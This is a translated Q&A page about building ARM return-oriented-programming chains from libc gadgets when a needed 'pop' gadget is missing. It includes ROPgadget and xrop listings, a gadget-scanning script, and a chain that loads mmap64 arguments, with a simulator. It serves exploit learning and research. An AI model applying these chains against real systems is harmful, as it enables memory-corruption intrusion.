web-dev-qa-db-ja.com

ARM - ROP programming/exploitation with gadget chains

Unfortunately this gadget cannot be found in libc.so. How can I reprogram it using different instructions?

pop {r0, r1, r2, r3, pc}

Which instructions achieve the same thing? Which gadgets should I look for?

It is related to this exploit:

# pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

Thanks,

Update:

These gadgets are available in my libc.so.

Which is better, ROPgadget or xrop? xrop clearly showed more gadgets.

ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}

And with xrop:

Usage: xrop [-r Arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
     -b (16 | 32 | 64) sets the processor mode
     -r (arm | mips | powerpc | x86) raw binary file of given architecture
     -v displays the version number
     -l (b | e) big or little endian
     -e skips <bytes> of header
     -a rellocate at given address
     -n disable colors in the output
     -s filter gadgets with <regex>
     -h prints this menu

$ ./xrop -r arm -b 32 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

$ ./xrop -r arm -b 64 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________
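The two listings above differ partly because xrop also decodes Thumb code (the entries it prints as "1 + offset", i.e. the address with bit 0 set), whereas ROPgadget searches ARM state only unless it is run with --thumb. As an added illustration that is not part of the original question, the following Python script encodes the ARM, 16-bit Thumb and 32-bit Thumb-2 forms of a given pop {...} and scans a raw byte blob for them, reporting Thumb hits with bit 0 set the way xrop does. The sample "text section" is constructed here; the gadgets planted in it and their offsets are arbitrary and do not come from the libc.so in the question.

```python
import struct

REG_NAMES = {f"r{i}": i for i in range(16)}
REG_NAMES.update(sl=10, fp=11, ip=12, sp=13, lr=14, pc=15)


def reglist_mask(regs):
    """Bitmask with one bit per register, as used by LDM/STM/POP encodings."""
    return sum(1 << REG_NAMES[r] for r in regs)


def arm_pop(regs):
    """ARM-state POP {regs} is LDMIA sp!, {regs}: cond=AL, W=1, L=1, Rn=sp."""
    return struct.pack("<I", 0xE8BD0000 | reglist_mask(regs))


def thumb16_pop(regs):
    """16-bit Thumb POP (1011110P rrrrrrrr): only r0-r7 and pc; None if not encodable."""
    mask = reglist_mask(regs)
    if mask & ~0x80FF:
        return None
    return struct.pack("<H", 0xBC00 | ((mask >> 15) << 8) | (mask & 0xFF))


def thumb32_pop(regs):
    """32-bit Thumb-2 POP.W: halfwords 0xE8BD then the list (no sp, not pc and lr together)."""
    mask = reglist_mask(regs)
    if mask & (1 << 13) or (mask & 0xC000) == 0xC000:
        return None
    return struct.pack("<HH", 0xE8BD, mask)


def find_pop_gadgets(blob, regs):
    """Return (mode, address) pairs; Thumb addresses carry bit 0 like xrop's '1 +'."""
    hits = []
    arm = arm_pop(regs)
    for off in range(0, len(blob) - 3, 4):            # ARM instructions are word aligned
        if blob[off:off + 4] == arm:
            hits.append(("arm", off))
    for enc in (thumb16_pop(regs), thumb32_pop(regs)):
        if enc is None:
            continue
        for off in range(0, len(blob) - len(enc) + 1, 2):   # Thumb: halfword aligned
            if blob[off:off + len(enc)] == enc:
                hits.append(("thumb", off | 1))
    return sorted(hits, key=lambda h: h[1])


# Constructed sample "text section": zero padding with three gadgets planted in it.
SAMPLE = (b"\x00" * 0x10
          + arm_pop(["r3", "pc"])                        # ARM     pop {r3, pc}            @ 0x10
          + b"\x00" * 0x0E
          + thumb16_pop(["r0", "r1", "r2", "r6", "pc"])  # Thumb   pop {r0,r1,r2,r6,pc}    @ 0x22
          + b"\x00" * 0x0C
          + thumb32_pop(["r3", "r8", "pc"])              # Thumb-2 pop.w {r3, r8, pc}      @ 0x30
          + b"\x00" * 0x10)

if __name__ == "__main__":
    for regs in (["r0", "r1", "r2", "r3", "pc"], ["r3", "pc"],
                 ["r0", "r1", "r2", "r6", "pc"], ["r3", "r8", "pc"]):
        print(regs, find_pop_gadgets(SAMPLE, regs))
```

Searching the sample for pop {r0, r1, r2, r3, pc} returns nothing, which is the situation in the question; the same scan finds the ARM pop {r3, pc} and the Thumb pop {r0, r1, r2, r6, pc} that the tools reported. A scanner like this only finds the literal encodings it was given; real tools also report the same pop reached through a preceding instruction, which is why the xrop listing shows several instructions before each pop.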
7
dev

I didn't take a close look, but with the xrop result 1 + 0x59554 : pop {r0, r1, r2, r6} and the ROPgadget result 0x00042d00 : pop {r3, pc}, have you tried fitting these into your ROP stack?

page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval)  #r0 - mmap() address in exploit.
page += p32(r1_popval)  #r1 - size in exploit.
page += p32(r2_popval)  #r2 - protection in exploit.
page += p32(r6_popval)  #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc)  #ROPgadget result with loaded offset
page += p32(r3_popval)  #r3 - flags for mmap in exploit.
page += p32(mmap64_address)     #for popping into pc to call mmap64(). 

I think it's fine as long as they are valid gadgets. Consider also searching for Thumb gadgets, if you have good gadgets for branching and exchanging between modes.

I've been learning from similar material using ROPgadget without problems, but I'd recommend using whichever one has ready-made features that let you do what you need faster. For example, I like ROPgadget's automated ropchain generation, but that is not a feature for ARM.

2
dreamist
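As an added worked example (not code from the question, the answer or any exploit), the following Python builds the two-gadget chain the answer sketches and replays it the way the CPU's pops would, so the register values and the final pc can be checked before anything is sent to a target. It uses the xrop entry 1 + 0x1a8c pop {r0, r1, r2, r6, pc} (the listing entries at 1 + 0x1a8c and 1 + 0x6b1d4 end in pc; the one at 1 + 0x59554 does not) together with ROPgadget's 0x00042d00 pop {r3, pc}. The libc load address, the mmap64 offset and the argument values are assumed placeholders; the real ones come from the target and its ELF symbol table. The point a practitioner wants checked is interworking: when pop loads pc, bit 0 of the popped word selects Thumb or ARM state, so the Thumb gadget's address must keep bit 0 set and the ARM gadget's must be word aligned.

```python
import struct

# Assumed values for this example only: the libc load address and the mmap64
# symbol offset are placeholders; take the real ones from the target's ELF symtab
# (for Thumb functions the symbol value already carries bit 0).
LIBC_BASE = 0x76f00000
MMAP64_OFF = 0x0d4f0 | 1           # assumed Thumb function, so bit 0 set

# Gadget offsets as listed by the tools in the question. xrop prints Thumb
# gadgets as "1 + offset"; the value loaded into pc must keep that bit set.
POP_R0_R1_R2_R6_PC = 0x1a8c | 1    # xrop (Thumb):    pop {r0, r1, r2, r6, pc}
POP_R3_PC = 0x42d00                # ROPgadget (ARM): pop {r3, pc}

# Register lists in pop order: ascending register number, pc last.
GADGETS = {
    POP_R0_R1_R2_R6_PC: ("r0", "r1", "r2", "r6", "pc"),
    POP_R3_PC: ("r3", "pc"),
}

JUNK = 0x66666666                  # recognizable filler for r6, as in the answer


def p32(v):
    """Little-endian 32-bit word, the same as pwntools' p32 on ARM."""
    return struct.pack("<I", v & 0xffffffff)


def check_interworking(base):
    """pop {..., pc} selects the instruction set from bit 0 of the popped value."""
    thumb_ok = (base + POP_R0_R1_R2_R6_PC) & 1 == 1
    arm_ok = (base + POP_R3_PC) & 3 == 0
    return thumb_ok and arm_ok


def build_mmap64_chain(base, addr, length, prot, flags, fd=0xffffffff):
    """Stack words consumed after the pivot returns into the first gadget."""
    chain = p32(base + POP_R0_R1_R2_R6_PC)
    chain += p32(addr) + p32(length) + p32(prot) + p32(JUNK)   # r0, r1, r2, r6
    chain += p32(base + POP_R3_PC)
    chain += p32(flags)                                        # r3
    chain += p32(base + MMAP64_OFF)                            # popped into pc
    # mmap64's 5th and 6th arguments are passed on the stack (AAPCS): fd at [sp]
    # and the 64-bit offset 8-byte aligned; three zero words cover it either way.
    # fd = -1 assumes an anonymous mapping.
    chain += p32(fd) + p32(0) * 3
    return chain


def simulate(chain, base):
    """Replay the pops the way the CPU would; stops when pc leaves the gadget set."""
    words = list(struct.unpack("<%dI" % (len(chain) // 4), chain))
    regs = {}
    pc = words.pop(0)
    while (pc - base) in GADGETS:
        for r in GADGETS[pc - base]:
            if r == "pc":
                pc = words.pop(0)
            else:
                regs[r] = words.pop(0)
    return regs, pc, words            # leftover words are mmap64's stack arguments


if __name__ == "__main__":
    chain = build_mmap64_chain(LIBC_BASE, 0x10000, 0x1000, 7, 0x22)
    print("interworking ok:", check_interworking(LIBC_BASE))
    regs, pc, stack_args = simulate(chain, LIBC_BASE)
    print({k: hex(v) for k, v in sorted(regs.items())}, hex(pc), stack_args)
```

The simulation is deliberately naive: it models nothing but register pops, so it will not catch a gadget whose preceding instructions clobber a register or fault, nor a pop that also reloads sp (the popeq {r3, r4, r5, r6, r7, ip, sp, pc} entry in the listing is an example of one to avoid). It does catch the two mistakes that are easiest to make when mixing tool outputs: putting the stack words in listed rather than register order, and dropping or adding the Thumb bit on a gadget address.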